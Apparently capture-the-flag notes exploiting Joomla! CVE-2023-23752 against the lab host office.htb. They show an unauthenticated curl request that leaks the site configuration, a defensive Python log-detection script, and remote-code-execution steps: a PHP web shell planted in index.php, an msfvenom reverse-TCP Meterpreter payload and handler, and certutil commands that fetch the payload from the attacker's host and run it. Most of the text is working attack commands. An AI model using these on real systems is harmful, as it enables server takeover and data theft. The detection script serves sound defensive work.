Joomla!

CVE-2023-23752

On February 16, 2023, Joomla! published a security advisory for CVE-2023-23752. The advisory describes an “improper access check” affecting Joomla! 4.0.0 through 4.2.7. The following day, a Chinese-language blog shared the technical details of the vulnerability. The blog describes an authentication bypass that allows an attacker to leak privileged information. If an attacker can log into the Joomla! administrative web interface as the Super User, the attacker has an easy path to arbitrary code execution.

For Information Disclosure, run the following command.

curl 'http://office.htb/api/index.php/v1/config/application?public=true' | jp
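To spot the request above in web server logs, the following is an added detection example (not part of the original notes). It assumes Combined Log Format access logs and flags any request under /api/index.php/v1/ that carries a `public` query parameter; the function name and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined Log Format prefix: client, two ignored fields, [time],
# "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
API_PREFIX = "/api/index.php/v1/"  # path prefix taken from the request shown above


def find_public_param_requests(lines):
    """Return one dict per API request that carries a `public` query parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        client, when, method, target, status = m.groups()
        url = urlsplit(target)
        path = unquote(url.path).lower()  # normalise encoding and case
        params = {k.lower() for k in parse_qs(url.query, keep_blank_values=True)}
        if path.startswith(API_PREFIX) and "public" in params:
            hits.append({
                "client": client, "time": when, "method": method,
                "path": path, "status": int(status),
                # 200 means the server answered; treat the response as disclosed
                "answered": status == "200",
            })
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Feb/2023:10:12:01 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1892 "-" "curl/7.88.1"',
    '198.51.100.20 - - [17/Feb/2023:10:13:40 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [17/Feb/2023:10:14:02 +0000] "GET /api/index.php/v1/config/application HTTP/1.1" 401 93 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [18/Feb/2023:08:01:55 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 401 93 "-" "curl/7.88.1"',
]

if __name__ == "__main__":
    for hit in find_public_param_requests(SAMPLE_LOG):
        verdict = "ANSWERED (200)" if hit["answered"] else f"rejected ({hit['status']})"
        print(f"{hit['time']}  {hit['client']}  {hit['path']}  {verdict}")
```

A hit answered with 200 on a Joomla! 4.0.0 through 4.2.7 site means the application configuration was returned to an unauthenticated client, so rotate any credentials stored in it and upgrade past 4.2.7.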

For RCE, follow the steps below. Modify the index.php template to include the following line, then save it.

<?php if (isset($_GET['cmd'])) system($_GET['cmd']); ?> 
# Meterpreter version

# Create a meterpreter exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f exe -o shell1234.exe

# Set up a handler for meterpreter
sudo msfconsole -q -x "use exploit/multi/handler;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set AutoRunScript post/windows/manage/migrate;set LHOST 10.10.14.9;set LPORT 1234;run -j"

# Run the following commands after updating the index.php. 
Kali> curl -k 'http://office.htb/?cmd=certutil%20-urlcache%20-split%20-f%20http://10.10.14.9/shell1234.exe'
Kali> curl -k 'http://office.htb/?cmd=.\shell1234.exe'
